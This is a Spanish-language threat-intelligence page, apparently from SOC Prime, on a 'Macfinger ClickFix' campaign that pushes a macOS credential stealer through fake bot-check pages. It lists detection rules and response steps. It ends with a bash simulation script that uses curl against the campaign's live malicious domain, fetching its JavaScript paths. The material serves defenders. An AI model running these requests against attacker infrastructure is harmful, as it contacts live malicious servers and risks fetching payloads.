SOC Prime Bias: High

24 Sep 2026 06:40 UTC

Campaña Macfinger ClickFix

Author Photo
SOC Prime Team linkedin icon Seguir
Campaña Macfinger ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Una nueva campaña de ingeniería social rastreada como Macfinger ClickFix apunta a usuarios de macOS inyectando scripts maliciosos en sitios web legítimos. El ataque presenta falsas páginas de protección contra bots que engañan a las víctimas para que ejecuten comandos que descargan malware específico de macOS. La carga útil parece ser una variante del ladrón de macOS Atomic (AMOS) diseñado para robar credenciales y otra información del usuario.

Investigación

La investigación identificó sitios web legítimos comprometidos con scripts inyectados que muestran ventanas emergentes de verificación falsas. El análisis del tráfico de red reveló un dominio dedicado utilizado para el seguimiento de usuarios, junto con varias direcciones IP que soportan la entrega de malware y las comunicaciones de Comando y Control (C2). Los patrones de tráfico observados indican exfiltración de credenciales e información del sistema a través de solicitudes HTTP POST.

Mitigación

Los usuarios deben ser entrenados para evitar seguir instrucciones presentadas por ventanas emergentes inesperadas del navegador o falsas páginas de verificación de bots. Las organizaciones deben implementar filtros web para bloquear dominios y direcciones IP maliciosas conocidas asociadas con campañas de ClickFix. También se recomienda monitorear conexiones salientes inusuales a direcciones IP no confiables a través de puertos no estándar.

Respuesta

Si se detecta actividad de Macfinger ClickFix, los hosts macOS afectados deben ser aislados inmediatamente para detener la exfiltración de datos adicionales. Los respondedores deben realizar una investigación forense completa para determinar el alcance del compromiso de credenciales. Las credenciales potencialmente expuestas deben ser restablecidas, y los sistemas deben ser revisados para detectar mecanismos de persistencia como scripts shell no autorizados o binarios Mach-O.

Flujo de Ataque

Todavía estamos actualizando esta parte.

Detecciones

Intento de Comunicación de Dominio de Consulta de IP Posible (vía dns)

Equipo SOC Prime
23 Sep 2026

Comando y Control Sospechoso por Solicitud DNS a Dominio de Nivel Superior (TLD) Inusual (vía dns)

Equipo SOC Prime
23 Sep 2026

Intento de Enumeración de System_profiler Posible (vía process_creation)

Equipo SOC Prime
23 Sep 2026

Manipulación de Cadenas Codificadas en Base64 Posible [MacOS] (vía cmdline)

Equipo SOC Prime
23 Sep 2026

Intento de Ejecución de Curl Sospechoso [MacOS] (vía cmdline)

Equipo SOC Prime
23 Sep 2026

IOC (HashSha256) para detectar: campaña Macfinger ClickFix

Reglas de IA de SOC Prime
23 Sep 2026

IOC (SourceIP) para detectar: campaña Macfinger ClickFix

Reglas de IA de SOC Prime
23 Sep 2026

IOC (DestinationIP) para detectar: campaña Macfinger ClickFix

Reglas de IA de SOC Prime
23 Sep 2026

Detectar Tráfico de la Campaña Macfinger ClickFix [Firewall]

Reglas de IA de SOC Prime
23 Sep 2026

Detectar Inyección de Script de Macfinger ClickFix [Servidor Web]

Reglas de IA de SOC Prime
23 Sep 2026

Ejecución de Simulación

  • Narrativa & Comandos de Ataque: Un adversario utiliza una técnica de ingeniería social conocida como «ClickFix», donde se indica al usuario que haga clic en un botón (a menudo un falso «arreglo» o «actualización») que ejecuta un script malicioso. En esta simulación, imitamos la etapa final: el navegador/agente del lado del cliente realizando una solicitud al dominio controlado por Macfinger velvet-otter-glagceis.life para obtener un .js archivo malicioso. Esta solicitud está diseñada para coincidir con uno de los tres criterios de selección específicos en la lógica de detección.

  • Script de Prueba de Regresión:

    #!/bin/bash
    # Script de simulación para activar la regla de detección de Macfinger ClickFix
    
    echo "[*] Iniciando simulación de Macfinger ClickFix..."
    
    # Objetivo 1: selección1 (parámetro del sitio)
    echo "[*] Simulando solicitud a selección1..."
    curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.js?site=test_payload"
    
    # Objetivo 2: selección2 (archivo hash específico)
    echo "[*] Simulando solicitud a selección2..."
    curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.4b1009ff6c3f.js"
    
    # Objetivo 3: selección3 (archivo ext-b)
    echo "[*] Simulando solicitud a selección3..."
    curl -s -o /dev/null "http://velvet-otter-glagceis.life/ext-b.4f9db6afad06a.js"
    
    echo "[+] Simulación completa. Verifique las alertas en el SIEM."
  • Comandos de Limpieza:

    # No se requiere limpieza local ya que estas son solicitudes de red salientes.
    # Si se crearon archivos locales, elimínelos:
    rm -f /tmp/macfinger_test_*